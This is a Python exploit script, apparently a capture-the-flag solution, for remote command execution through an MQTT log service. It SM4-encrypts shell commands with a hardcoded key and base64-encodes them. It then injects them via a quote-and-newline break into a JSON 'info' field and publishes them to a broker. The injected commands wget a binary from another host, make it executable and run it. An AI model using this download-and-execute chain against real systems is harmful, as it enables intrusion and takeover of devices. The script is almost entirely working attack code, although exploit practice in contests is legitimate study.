import time
import struct
import base64
import paho.mqtt.client as mqtt
from gmssl.sm4 import CryptSM4, SM4_ENCRYPT, SM4_DECRYPT
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("Connected to MQTT Broker!")
else:
print("Failed to connect, return code %d\n", rc)
def pack_key(v24):
key_bytes = b''
for i in range(4):
key_bytes += struct.pack('<I', v24[i]) # 使用小端序打包每个整数
return key_bytes
def encode_sm4(value,key):
"""
SM4 加密
:value: python各数据格式
"""
crypt_sm4 = CryptSM4()
crypt_sm4.set_key(key, SM4_ENCRYPT)
# 使用crypt_ecb进行加密value
encrypt_value = crypt_sm4.crypt_ecb(value)
return encrypt_value
def decode_sm4(value,key):
crypt_sm4 = CryptSM4()
crypt_sm4.set_key(key, SM4_DECRYPT)
decrypt_value = crypt_sm4.crypt_ecb(value)
return decrypt_value
def get_input(command):
v24 = [0x9845DC01, 0x10CD5489, 0x67BA23FE, 0xEF32AB76]
key_bytes = pack_key(v24)
## --generate input--
test_key = key_bytes
cmd = b'"\n'
cmd += command
cmd += b'\n'
cmd = cmd.ljust(0x20,b"a")
#print(test_key)
#print(b"cmd:"+cmd)
#print("len_cmd:"+str(len(cmd)))
sm4_encode = encode_sm4(cmd,test_key)
#print(b"sm4_encode:"+sm4_encode)
#print("len_sm4_encode:"+str(len(sm4_encode)))
if len(sm4_encode) > 0x30 :
print("len_sm4_encode:"+str(len(sm4_encode)))
print("[+]erro:encode_sm4_string is too long!")
exit(0)
#print(sm4_encode[:32])
#print(decode_sm4(sm4_encode,test_key))
after_base64_decode = b"\xbf"+sm4_encode
mos_input = base64.b64encode(after_base64_decode)
#print(b"input:"+mos_input)
#print("len_input:"+str(len(mos_input)))
if (len(mos_input) & 3) :
print("len_input:"+str(len(mos_input)))
print("[+]erro:input len & 3 != 0")
exit(0)
return mos_input
if __name__ == "__main__":
cmd1 = b'wget http://192.168.1.219:9/z'
cmd2 = b'chmod +x /z'
cmd3 = b'/z'
#cmd1 = b'mkdir /tmp/nameless'
input1 = get_input(cmd1).decode()
input2 = get_input(cmd2).decode()
input3 = get_input(cmd3).decode()
print("[+]input1:"+input1)
print("[+]input2:"+input2)
print("[+]input3:"+input3)
p1 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input1+'"}'
p2 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input2+'"}'
p3 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input3+'"}'
print(p1)
print(p2)
print(p3)
## --try rce by mqtt--
client = mqtt.Client(mqtt.CallbackAPIVersion.VERSION1)
client.username_pw_set(username="xhlj2024", password="2758934")
client.on_connect = on_connect
client.connect("192.168.1.1", 8888)
topic = "logs"
client.publish(topic, p1)
time.sleep(2)
client.publish(topic,p2)
time.sleep(2)
client.publish(topic,p3)
time.sleep(2)
client.disconnect()